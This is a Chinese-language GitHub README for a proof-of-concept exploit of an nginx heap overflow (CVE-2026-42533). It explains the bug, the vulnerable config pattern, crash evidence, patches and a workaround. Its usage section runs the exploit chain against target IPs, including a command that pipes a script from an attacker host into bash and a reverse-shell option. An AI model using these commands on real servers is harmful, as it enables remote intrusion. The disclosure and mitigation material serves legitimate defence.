imbas007/CVE-2026-42533

GitHub: imbas007/CVE-2026-42533

CVE-2026-42533 的概念验证利用代码,演示了 nginx 两遍字符串求值引擎中的堆缓冲区溢出如何实现预认证 RCE。

Stars: 0 | Forks: 0

# CVE-2026-42533 — nginx 堆缓冲区溢出 PoC 漏洞利用 **通过两遍捕获覆盖实现预认证远程代码执行** **公开 PoC 发布于 2026-07-27** — 不要等待,立即修补。 | | | |---|---| | **CVE** | CVE-2026-42533 | | **CVSS 4.0** | 9.2 (严重) | | **类型** | 堆缓冲区溢出 (CWE-122) | | **受影响版本** | nginx 0.9.6 – 1.30.3 (稳定版), 0.9.6 – 1.31.2 (主线版) | | **已修复版本** | nginx 1.30.4 / 1.31.3, NGINX Plus R36 P7 / 37.0.3.1 | | **披露时间** | 2026-07-15 (F5 / NGINX) | | **PoC 发布时间** | 2026-07-27 | | **研究员** | Stan Shaw (0xCyberstan) | ## 已确认可行 | 平台 | 诊断 | 溢出 | 崩溃 | 信息泄露 | |----------|-----------|----------|-------|-----------| | **Ubuntu 24.04 x86_64** | ✅ | ✅ | ✅ SIGABRT | ⚠️ 部分可行 | ## 概述 CVE-2026-42533 是 nginx 两遍字符串求值引擎中存在的一个严重堆缓冲区溢出漏洞。当基于正则表达式的 `map` 指令与带编号的捕获组(`$1`、`$2` 等)交互时,共享的 `r->captures` 结构会在 LEN(测量)和 VALUE(写入)遍历之间被静默覆盖。这会导致大小不匹配: - **较大的捕获 → 堆缓冲区溢出**(攻击者可控的越界写入) - **较小的捕获 → 信息泄露**(暴露未初始化的堆内存,泄露 libc/堆指针) 将这两个利用原语组合使用,可以实现**可靠的预认证 RCE**,从而绕过 ASLR —— 在 Ubuntu 24.04 上演示了 10/10 的可靠性。 ## 工作原理 ``` ┌─────────────────────────────────────────────────────────────┐ │ LEN PASS (measure) │ │ $1 from location ~ ^/api/(...)$ = "abc" → measures 3 bytes│ │ $overflow_gadget = giant_header → measures 5000 bytes │ │ Buffer allocated: 5003 bytes │ │ │ │ [ $overflow_gadget triggers map regex → clobbers $1 ] │ │ $1 now = giant_header (5000 bytes) │ │ │ │ VALUE PASS (write) │ │ $1 writes 5000 bytes (LEN said 3!) → OVERFLOW! │ │ $overflow_gadget writes 5000 bytes │ │ Total written: 10000 bytes into 5003-byte buffer │ │ → 4997 bytes overflow into adjacent heap │ └─────────────────────────────────────────────────────────────┘ ``` 溢出会破坏相邻的堆结构。主要目标是 `ngx_pool_cleanup_t`: ``` struct ngx_pool_cleanup_s { ngx_pool_cleanup_pt handler; // function pointer → overwrite for RIP control void *data; // argument to handler ngx_pool_cleanup_t *next; // next in chain }; ``` 当连接池被销毁时,会调用 `handler(data)` → 从而实现任意代码执行。 ## 仓库结构 ``` CVE-2026-42533/ ├── exploit/ │ ├── exploit.py # Full exploit chain (leak → spray → overflow → RCE) │ ├── leak.py # Info leak module (heap/libc pointer leak) │ ├── overflow.py # Heap overflow module (crash / RCE trigger) │ ├── analyze.py # GDB analysis helper for offset determination │ └── requirements.txt # Python dependencies ├── nginx/ │ └── nginx.conf # Vulnerable nginx configuration ├── Dockerfile # Docker build for test environment (Ubuntu 24.04) ├── docker-compose.yml # Docker Compose for easy deployment └── README.md ``` ## 快速开始 ### 前置条件 - Python 3.8+ 并带有 `requests` 库 - 目标:具有易受攻击配置的 nginx 0.9.6–1.30.3/1.31.2(见下文) ### 1. 验证漏洞(安全) ``` # 诊断模式 — 显示 two-pass mismatch(安全,不会崩溃) python3 exploit/overflow.py --diagnose ``` 输出: ``` header= 10: LEN= 13 actual= 13 internal_overflow= 7 ✓ header= 100: LEN= 103 actual= 103 internal_overflow= 97 ✓ header= 1000: LEN= 1003 actual= 1003 internal_overflow= 997 ✓ ``` ### 2. 崩溃 PoC(证明可利用性) ``` python3 exploit/overflow.py --crash ``` 在 Ubuntu 24.04 上的结果: ``` worker process 12282 exited on signal 6 (core dumped) free(): invalid next size (normal) ``` ### 3. 设置测试环境 ``` # Ubuntu 24.04(确认可用) ssh root@ apt-get install -y build-essential libpcre2-dev libssl-dev zlib1g-dev wget https://nginx.org/download/nginx-1.27.4.tar.gz tar xzf nginx-1.27.4.tar.gz && cd nginx-1.27.4 ./configure --prefix=/usr/local/nginx --with-cc-opt='-g -O0' make -j$(nproc) && make install # 复制易受攻击的配置 cp nginx/nginx.conf /usr/local/nginx/conf/nginx.conf /usr/local/nginx/sbin/nginx # 从您的机器运行 exploit python3 exploit/overflow.py --diagnose ``` ### 4. Docker(替代方案) ``` docker compose up -d --build python3 exploit/overflow.py localhost --port 8080 --diagnose ``` ## 用法 ### 完整漏洞利用链 ``` python3 exploit/exploit.py [options] # 示例: python3 exploit/exploit.py 192.168.1.100 # full auto python3 exploit/exploit.py 192.168.1.100 --leak-only # recon only python3 exploit/exploit.py 192.168.1.100 --crash # verify vuln python3 exploit/exploit.py 192.168.1.100 --cmd "id > /tmp/pwned" # 手动模式(如果您有预先泄露的地址) python3 exploit/exploit.py 192.168.1.100 \ --libc 0x7f1234000000 \ --heap 0x5a1234000000 \ --cmd "curl http://attacker/shell.sh | bash" # Reverse shell python3 exploit/exploit.py 192.168.1.100 \ --reverse-shell --lhost 10.0.0.1 --lport 4444 ``` ### 信息泄露模块 ``` python3 exploit/leak.py [options] # 安静模式(仅输出地址) python3 exploit/leak.py 192.168.1.100 -q # LIBC:0x7f1234567890 # HEAP:0x5a1234567890 ``` ### 溢出模块 ``` python3 exploit/overflow.py --crash # crash worker (PoC) python3 exploit/overflow.py --spray # heap spray only ``` ## 易受攻击的配置模式 该漏洞利用需要在 nginx 配置中包含此特定模式: ``` # 1. 基于 regex 的 map(会覆盖 capture state) map $http_x_overflow $overflow_gadget { "~^(.+)$" $1; # regex match overwrites $1 default ""; } # 2. regex location(会创建 capture) server { location ~ ^/api/(...)$ { # creates $1, $2, ... # 3. Both capture AND map variable in same directive return 200 "$1$overflow_gadget"; # ← two-pass sink } } ``` 使用公开的扫描程序**检测易受攻击的配置**: - https://github.com/0xCyberstan/CVE-2026-42533-Config-Scanner ## 崩溃证明 (Ubuntu 24.04) ``` Worker PID: 12282 [Phase 1] Diagnostic: header=100: LEN=103, response=103 ✓ header=1000: LEN=1003, response=1003 ✓ (997 byte internal overflow!) [Phase 2] Heap Corruption: 8000-byte header → VALUE writes 16000 bytes into 8003-byte buffer → 7997 bytes overflow past buffer boundary Worker PID: 12331 (NEW — old worker DEAD!) Error log: free(): invalid next size (normal) worker process 12282 exited on signal 6 (core dumped) ``` ## 缓解措施 ### 立即处理(修补) ``` # 升级到已修复的版本: # nginx 1.30.4+(stable)/ 1.31.3+(mainline) # NGINX Plus R36 P7 / 37.0.3.1 ``` ### 临时变通方案 在 `map` 指令中,将带编号的捕获替换为**命名捕获**: ``` # 存在漏洞 map $http_foo $bar { "~^(.+)$" $1; # numbered capture → clobbers shared state } # 已缓解 map $http_foo $bar { "~^(?.+)$" $val; # named capture → isolated } ``` ### 检测 - 运行配置扫描程序:https://github.com/0xCyberstan/CVE-2026-42533-Config-Scanner - 监控意外的 nginx worker 重启 - 检查 nginx 版本:`nginx -v`(应 ≥ 1.30.4 或 ≥ 1.31.3) ## 参考 - [F5 安全公告](https://my.f5.com/manage/s/article/K000143677) - [0xCyberstan 技术分析](https://cyberstan.co.uk/nginx-rce/) - [CVE-2026-42533 配置扫描程序](https://github.com/0xCyberstan/CVE-2026-42533-Config-Scanner) ## 免责声明 本 PoC 的发布仅用于**安全研究和防御目的**。请仅针对您拥有或获得明确授权进行测试的系统使用。该漏洞已被修补 — 如果您尚未升级,请立即升级。
标签:CISA项目, Nginx, PoC, 堆溢出, 安全, 暴力破解, 版权保护, 编程工具, 请求拦截, 超时处理, 远程代码执行, 逆向工具